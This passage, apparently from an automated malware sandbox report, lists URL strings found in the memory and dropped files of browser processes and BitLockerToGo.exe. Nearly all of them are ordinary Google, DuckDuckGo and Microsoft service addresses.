Source: manifest.json0.14.dr	String found in binary or memory: https://drive-daily-6.corp.google.com/
Source: manifest.json0.14.dr	String found in binary or memory: https://drive-preprod.corp.google.com/
Source: manifest.json0.14.dr	String found in binary or memory: https://drive-staging.corp.google.com/
Source: chrome.exe, 00000005.00000003.2576752602.000012B001160000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://drive-thirdparty.googleusercontent.com/32/type/
Source: manifest.json0.14.dr	String found in binary or memory: https://drive.google.com/
Source: chrome.exe, 00000005.00000002.2658138712.000012B000C40000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://drive.google.com/0
Source: chrome.exe, 00000005.00000002.2655899941.000012B000793000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000005.00000002.2658079702.000012B000C1C000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://drive.google.com/:
Source: chrome.exe, 00000005.00000002.2655440089.000012B000694000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000005.00000002.2655899941.000012B000793000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000005.00000002.2658079702.000012B000C1C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000005.00000002.2657021255.000012B000954000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://drive.google.com/?lfhs=2
Source: chrome.exe, 00000005.00000002.2657021255.000012B000954000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://drive.google.com/?lfhs=2ation.Result
Source: chrome.exe, 00000005.00000002.2657021255.000012B000954000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://drive.google.com/?lfhs=2d
Source: chrome.exe, 00000005.00000002.2655899941.000012B000793000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000005.00000002.2658079702.000012B000C1C000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://drive.google.com/J
Source: chrome.exe, 00000005.00000002.2661409753.000012B0019D8000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://drive.google.com/drive/installwebapp?usp=chrome_default
Source: chrome.exe, 00000005.00000002.2658138712.000012B000C40000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://drive.google.com/y
Source: chrome.exe, 00000005.00000002.2657994939.000012B000BEC000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000005.00000002.2657021255.000012B000954000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://duckduckgo.com/?q=
Source: chrome.exe, 00000005.00000002.2657021255.000012B000954000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://duckduckgo.com/?q=searchTerms
Source: BitLockerToGo.exe, 00000003.00000003.2873139264.00000000058D2000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000003.00000002.3091820115.00000000058D2000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000003.00000003.2874778329.00000000058D2000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000003.00000002.3092709929.0000000005BDE000.00000004.00000020.00020000.00000000.sdmp, chrome.exe, 00000005.00000003.2576376283.000012B000BCC000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000005.00000003.2596932828.000012B000BD0000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000005.00000003.2568720854.000012B000BD0000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000005.00000003.2631006849.000012B000BCC000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000005.00000002.2657952507.000012B000BD0000.00000004.00000800.00020000.00000000.sdmp, oz5fcj.3.dr, Web Data.14.dr, knyukx.3.dr	String found in binary or memory: https://duckduckgo.com/ac/?q=
Source: BitLockerToGo.exe, 00000003.00000003.2873139264.00000000058D2000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000003.00000002.3091820115.00000000058D2000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000003.00000003.2874778329.00000000058D2000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000003.00000002.3092709929.0000000005BDE000.00000004.00000020.00020000.00000000.sdmp, chrome.exe, 00000005.00000002.2657994939.000012B000BEC000.00000004.00000800.00020000.00000000.sdmp, oz5fcj.3.dr, Web Data.14.dr, knyukx.3.dr	String found in binary or memory: https://duckduckgo.com/chrome_newtab
Source: chrome.exe, 00000005.00000002.2657994939.000012B000BEC000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://duckduckgo.com/favicon.ico
Source: BitLockerToGo.exe, 00000003.00000003.2873139264.00000000058D2000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000003.00000002.3091820115.00000000058D2000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000003.00000003.2874778329.00000000058D2000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000003.00000002.3092709929.0000000005BDE000.00000004.00000020.00020000.00000000.sdmp, oz5fcj.3.dr, Web Data.14.dr, knyukx.3.dr	String found in binary or memory: https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=
Source: HubApps Icons.14.dr, 0adad5b1-40aa-46d8-b337-6a814dd618d9.tmp.14.dr	String found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_M365_light.png/1.7.32/asset
Source: HubApps Icons.14.dr, 0adad5b1-40aa-46d8-b337-6a814dd618d9.tmp.14.dr	String found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_action_center_maximal_light.png/1.2.1/as
Source: HubApps Icons.14.dr, 0adad5b1-40aa-46d8-b337-6a814dd618d9.tmp.14.dr	String found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_edrop_maximal_light.png/1.1.12/asset
Source: HubApps Icons.14.dr, 0adad5b1-40aa-46d8-b337-6a814dd618d9.tmp.14.dr	String found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_games_maximal_light.png/1.7.1/asset
Source: HubApps Icons.14.dr, 0adad5b1-40aa-46d8-b337-6a814dd618d9.tmp.14.dr	String found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_outlook_light.png/1.9.10/asset
Source: HubApps Icons.14.dr, 0adad5b1-40aa-46d8-b337-6a814dd618d9.tmp.14.dr	String found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_search_maximal_light.png/1.3.6/asset
Source: HubApps Icons.14.dr, 0adad5b1-40aa-46d8-b337-6a814dd618d9.tmp.14.dr	String found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_shopping_maximal_light.png/1.4.0/asset
Source: HubApps Icons.14.dr, 0adad5b1-40aa-46d8-b337-6a814dd618d9.tmp.14.dr	String found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_toolbox_maximal_light.png/1.5.13/asset
Source: chrome.exe, 00000005.00000003.2604750901.000012B001834000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://google-ohttp-relay-join.fastly-edge.com/
Source: chrome.exe, 00000005.00000003.2604683470.000012B00182C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000005.00000003.2604750901.000012B001834000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://google-ohttp-relay-join.fastly-edge.com/.
Source: chrome.exe, 00000005.00000003.2604683470.000012B00182C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000005.00000003.2604750901.000012B001834000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://google-ohttp-relay-join.fastly-edge.com/1
Source: chrome.exe, 00000005.00000003.2561091713.000063E00071C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000005.00000003.2603547292.000063E000974000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000005.00000003.2600581308.000012B00170C000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://google-ohttp-relay-join.fastly-edge.com/2J
Source: chrome.exe, 00000005.00000003.2604683470.000012B00182C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000005.00000003.2604750901.000012B001834000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://google-ohttp-relay-join.fastly-edge.com/4
Source: chrome.exe, 00000005.00000003.2604683470.000012B00182C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000005.00000003.2604750901.000012B001834000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://google-ohttp-relay-join.fastly-edge.com/8
Source: chrome.exe, 00000005.00000003.2604683470.000012B00182C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000005.00000003.2604750901.000012B001834000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://google-ohttp-relay-join.fastly-edge.com/;
Source: chrome.exe, 00000005.00000003.2604683470.000012B00182C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000005.00000003.2604750901.000012B001834000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://google-ohttp-relay-join.fastly-edge.com/?
Source: chrome.exe, 00000005.00000003.2602448171.000012B001D84000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://google-ohttp-relay-join.fastly-edge.com/Q
Source: chrome.exe, 00000005.00000003.2602448171.000012B001D84000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://google-ohttp-relay-join.fastly-edge.com/W
Source: chrome.exe, 00000005.00000003.2602448171.000012B001D84000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://google-ohttp-relay-join.fastly-edge.com/Z
Source: chrome.exe, 00000005.00000003.2602448171.000012B001D84000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://google-ohttp-relay-join.fastly-edge.com/g
Source: chrome.exe, 00000005.00000003.2604683470.000012B00182C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000005.00000002.2675612452.000063E000920000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000005.00000003.2602448171.000012B001D84000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000005.00000003.2604750901.000012B001834000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://google-ohttp-relay-query.fastly-edge.com/
Source: chrome.exe, 00000005.00000003.2561091713.000063E00071C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000005.00000003.2603547292.000063E000974000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000005.00000003.2600581308.000012B00170C000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://google-ohttp-relay-query.fastly-edge.com/2P
Source: chrome.exe, 00000005.00000003.2600581308.000012B00170C000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://google-ohttp-relay-safebrowsing.fastly-edge.com/b
Source: msedge.exe, 0000000D.00000002.2916645904.00007D88002D0000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://google.com/
Source: chrome.exe, 00000005.00000002.2653297340.000012B0001C4000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://google.com/googleapis.com
Source: chrome.exe, 00000005.00000002.2655292330.000012B000648000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://googleusercontent.com/
Source: chrome.exe, 00000005.00000003.2600581308.000012B00170C000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://goto.google.com/sme-bugs27
Source: chrome.exe, 00000005.00000003.2600581308.000012B00170C000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://goto.google.com/sme-bugs2e
Source: 2cc80dabc69f58b6_1.14.dr	String found in binary or memory: https://img-s-msn-com.akamaized.net/
Source: 2cc80dabc69f58b6_1.14.dr	String found in binary or memory: https://img-s.msn.cn/tenant/amp/entityid/
Source: BitLockerToGo.exe, 00000003.00000002.3094935239.0000000005E7D000.00000004.00000020.00020000.00000000.sdmp, lxlxt0.3.dr	String found in binary or memory: https://imp.mt48.net/static?id=7RHzfOIXjFEYsBdvIpkX4Qqm4p8dfCfm4pbW1pbWfpbW7ReNxR3UIG8zInwYIFIVs9eYi
Source: chrome.exe, 00000005.00000003.2569788251.000012B000DDC000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000005.00000002.2658925654.000012B000DF8000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://issuetracker.google.com/161903006
Source: chrome.exe, 00000005.00000003.2569788251.000012B000DDC000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000005.00000002.2658925654.000012B000DF8000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://issuetracker.google.com/166809097
Source: chrome.exe, 00000005.00000003.2569788251.000012B000DDC000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000005.00000002.2658925654.000012B000DF8000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://issuetracker.google.com/184850002
Source: chrome.exe, 00000005.00000003.2569788251.000012B000DDC000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000005.00000002.2658925654.000012B000DF8000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://issuetracker.google.com/187425444
Source: chrome.exe, 00000005.00000003.2569788251.000012B000DDC000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000005.00000002.2658925654.000012B000DF8000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://issuetracker.google.com/220069903
Source: chrome.exe, 00000005.00000003.2569788251.000012B000DDC000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000005.00000002.2658925654.000012B000DF8000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://issuetracker.google.com/229267970
Source: chrome.exe, 00000005.00000003.2569788251.000012B000DDC000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000005.00000002.2658925654.000012B000DF8000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://issuetracker.google.com/250706693
Source: chrome.exe, 00000005.00000003.2569788251.000012B000DDC000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000005.00000002.2658925654.000012B000DF8000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://issuetracker.google.com/253522366
Source: chrome.exe, 00000005.00000003.2569788251.000012B000DDC000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000005.00000002.2658925654.000012B000DF8000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://issuetracker.google.com/255411748
Source: chrome.exe, 00000005.00000003.2569788251.000012B000DDC000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000005.00000002.2658925654.000012B000DF8000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://issuetracker.google.com/258207403
Source: chrome.exe, 00000005.00000003.2569788251.000012B000DDC000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000005.00000002.2658925654.000012B000DF8000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://issuetracker.google.com/274859104
Source: msedge.exe, 00000009.00000003.2692796951.000018A00037C000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://issuetracker.google.com/284462263
Source: chrome.exe, 00000005.00000003.2569788251.000012B000DDC000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000005.00000002.2658107951.000012B000C28000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://issuetracker.google.com/issues/166475273
Source: chrome.exe, 00000005.00000002.2656199136.000012B000798000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000005.00000002.2660125995.000012B001018000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000005.00000002.2654763220.000012B0004C8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000005.00000002.2656230561.000012B0007B0000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://keep.google.com/u/0/?usp=chrome_actions#NEWNOTE
Source: chrome.exe, 00000005.00000002.2656199136.000012B000798000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000005.00000002.2660125995.000012B001018000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000005.00000002.2654763220.000012B0004C8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000005.00000002.2656230561.000012B0007B0000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://keep.google.com/u/0/?usp=chrome_actions#NEWNOTEkly
Source: chrome.exe, 00000005.00000002.2672424566.000063E000238000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000005.00000002.2657266018.000012B0009D8000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://labs.google.com/search/experiment/2
Source: chrome.exe, 00000005.00000003.2600336013.000012B001CBC000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000005.00000003.2601534019.000012B001CBC000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000005.00000003.2601709863.000012B001CC0000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000005.00000002.2675519530.000063E000904000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000005.00000002.2656230561.000012B0007B0000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000005.00000002.2672424566.000063E000238000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://labs.google.com/search/experiment/2/springboard
Source: chrome.exe, 00000005.00000003.2561091713.000063E00071C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000005.00000003.2603547292.000063E000974000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://labs.google.com/search/experiment/2/springboard2
Source: chrome.exe, 00000005.00000003.2561091713.000063E00071C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000005.00000003.2603547292.000063E000974000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://labs.google.com/search/experiment/2/springboardb
Source: chrome.exe, 00000005.00000002.2672424566.000063E000238000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://labs.google.com/search/experiment/2/springboardc
Source: chrome.exe, 00000005.00000002.2675519530.000063E000904000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://labs.google.com/search/experiment/2/springboardhttps://labs.google.com/search/experiments
Source: chrome.exe, 00000005.00000002.2675519530.000063E000904000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000005.00000002.2657266018.000012B0009D8000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://labs.google.com/search/experiments
Source: chrome.exe, 00000005.00000002.2654375078.000012B0003A0000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000005.00000003.2596196297.000012B0012E8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000005.00000003.2595776933.000012B0015D4000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000005.00000003.2596769028.000012B001628000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://labs.google.com/search?source=ntp
Source: chrome.exe, 00000005.00000003.2576966972.000012B00120C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000005.00000003.2577187315.000012B000E30000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000005.00000003.2576473521.000012B00041C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000005.00000003.2576752602.000012B001160000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://lens.google.com/upload
Source: chrome.exe, 00000005.00000003.2576966972.000012B00120C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000005.00000003.2577187315.000012B000E30000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000005.00000003.2576473521.000012B00041C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000005.00000003.2576752602.000012B001160000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://lens.google.com/uploadbyurl
Source: chrome.exe, 00000005.00000003.2561091713.000063E00071C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000005.00000003.2603547292.000063E000974000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://lens.google.com/v3/2
Source: chrome.exe, 00000005.00000003.2561749234.000063E000878000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000005.00000003.2576473521.000012B00041C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000005.00000003.2576752602.000012B001160000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000005.00000002.2675487425.000063E0008D8000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://lens.google.com/v3/upload
Source: chrome.exe, 00000005.00000003.2603547292.000063E000974000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000005.00000003.2600813873.000012B0016B4000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://lens.google.com/v3/upload2
Source: chrome.exe, 00000005.00000002.2675612452.000063E000920000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://lens.google.com/v3/uploadSidePanelCompanionDesktopM116Plus
Source: chrome.exe, 00000005.00000002.2675612452.000063E000920000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://lens.google.com/v3/uploadSidePanelCompanionDesktopM116PlusEnabled_UnPinned_NewTab_20230918=
Source: chrome.exe, 00000005.00000002.2675487425.000063E0008D8000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://lens.google.com/v3/uploadcompanion-iph-blocklisted-page-urlsexps-registration-success-page-u
Source: chrome.exe, 00000005.00000003.2600581308.000012B00170C000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://lensfrontend-pa.googleapis.com/v1/crupload2
Source: chrome.exe, 00000005.00000002.2653544521.000012B00020C000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://m.google.com/devicemanagement/data/api
Source: chrome.exe, 00000005.00000002.2655745166.000012B000720000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://mail.google.com/mail/
Source: chrome.exe, 00000005.00000002.2655745166.000012B000720000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://mail.google.com/mail/0
Source: chrome.exe, 00000005.00000002.2660841864.000012B00149C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000005.00000002.2655899941.000012B000793000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000005.00000002.2651736616.000012B0000E0000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://mail.google.com/mail/:
Source: chrome.exe, 00000005.00000002.2654375078.000012B0003A0000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000005.00000003.2596196297.000012B0012E8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000005.00000003.2595776933.000012B0015D4000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000005.00000003.2596769028.000012B001628000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://mail.google.com/mail/?tab=rm&ogbl
Source: chrome.exe, 00000005.00000002.2660841864.000012B00149C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000005.00000002.2655899941.000012B000793000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000005.00000002.2660340819.000012B00111C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000005.00000003.2568464031.000012B000C28000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000005.00000002.2651736616.000012B0000E0000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000005.00000002.2658107951.000012B000C28000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://mail.google.com/mail/?usp=installed_webapp
Source: chrome.exe, 00000005.00000002.2660841864.000012B00149C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000005.00000002.2655899941.000012B000793000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000005.00000002.2651736616.000012B0000E0000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://mail.google.com/mail/J
Source: chrome.exe, 00000005.00000002.2660841864.000012B00149C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000005.00000002.2655899941.000012B000793000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000005.00000002.2660340819.000012B00111C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000005.00000002.2660125995.000012B001018000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000005.00000002.2661409753.000012B0019D8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000005.00000003.2568464031.000012B000C28000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000005.00000002.2651736616.000012B0000E0000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://mail.google.com/mail/installwebapp?usp=chrome_default
Source: msedge.exe, 0000000D.00000002.2916645904.00007D88002D0000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://msn.cn/
Source: msedge.exe, 0000000D.00000002.2916645904.00007D88002D0000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://msn.com/
Source: chrome.exe, 00000005.00000002.2654851711.000012B0004FC000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000005.00000002.2655745166.000012B000720000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000005.00000002.2660153200.000012B001054000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://myaccount.google.com/?utm_source=ga-chrome-actions&utm_medium=manageGA
Source: chrome.exe, 00000005.00000002.2654731400.000012B0004B0000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000005.00000002.2657021255.000012B000954000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000005.00000002.2655780936.000012B000748000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://myaccount.google.com/data-and-privacy?utm_source=ga-chrome-actions&utm_medium=managePrivacy
Source: chrome.exe, 00000005.00000002.2654731400.000012B0004B0000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://myaccount.google.com/data-and-privacy?utm_source=ga-chrome-actions&utm_medium=managePrivacyf
Source: chrome.exe, 00000005.00000002.2654731400.000012B0004B0000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000005.00000002.2655780936.000012B000748000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://myaccount.google.com/find-your-phone?utm_source=ga-chrome-actions&utm_medium=findYourPhone
Source: chrome.exe, 00000005.00000002.2655780936.000012B000748000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://myaccount.google.com/find-your-phone?utm_source=ga-chrome-actions&utm_medium=findYourPhoneaf
Source: chrome.exe, 00000005.00000003.2600581308.000012B00170C000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://myaccount.google.com/shielded-email2B
Source: chrome.exe, 00000005.00000003.2607443301.000012B0019C0000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://myaccount.google.com/shielded-email?utm_source=chrome
Source: chrome.exe, 00000005.00000003.2600581308.000012B00170C000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://myaccount.google.com/shielded-email?utm_source=chrome2B
Source: chrome.exe, 00000005.00000002.2654731400.000012B0004B0000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000005.00000002.2655780936.000012B000748000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://myaccount.google.com/signinoptions/password?utm_source=ga-chrome-actions&utm_medium=changePW
Source: chrome.exe, 00000005.00000002.2657021255.000012B000977000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000005.00000002.2657176249.000012B0009A8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000005.00000003.2573080276.000012B000E30000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://myactivity.google.com/
Source: 2cc80dabc69f58b6_1.14.dr	String found in binary or memory: https://ntp.msn.cn/edge/ntp
Source: 2cc80dabc69f58b6_0.14.dr, 000003.log10.14.dr	String found in binary or memory: https://ntp.msn.com
Source: 000003.log9.14.dr, 000003.log4.14.dr	String found in binary or memory: https://ntp.msn.com/
Source: 2cc80dabc69f58b6_1.14.dr, 000003.log4.14.dr	String found in binary or memory: https://ntp.msn.com/edge/ntp
Source: 2cc80dabc69f58b6_1.14.dr, 000003.log4.14.dr	String found in binary or memory: https://ntp.msn.com/edge/ntp/service-worker.js?bundles=latest&riverAgeMinutes=2880&navAgeMinutes=288
Source: 2cc80dabc69f58b6_0.14.dr	String found in binary or memory: https://ntp.msn.comService-Worker-Allowed:
Source: chrome.exe, 00000005.00000002.2653297340.000012B0001C4000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://oauthaccountmanager.googleapis.com/
Source: chrome.exe, 00000005.00000002.2653544521.000012B00020C000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://oauthaccountmanager.googleapis.com/v1/issuetoken
Source: msedge.exe, 0000000D.00000002.2916645904.00007D88002D0000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://office.net/
Source: chrome.exe, 00000005.00000003.2596196297.000012B0012E8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000005.00000003.2595776933.000012B0015D4000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000005.00000003.2596065846.000012B001598000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000005.00000003.2595839601.000012B00160C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000005.00000003.2596769028.000012B001628000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://ogads-pa.googleapis.com
Source: chrome.exe, 00000005.00000002.2660312225.000012B00110C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000005.00000002.2655350065.000012B000658000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://ogs.google.com
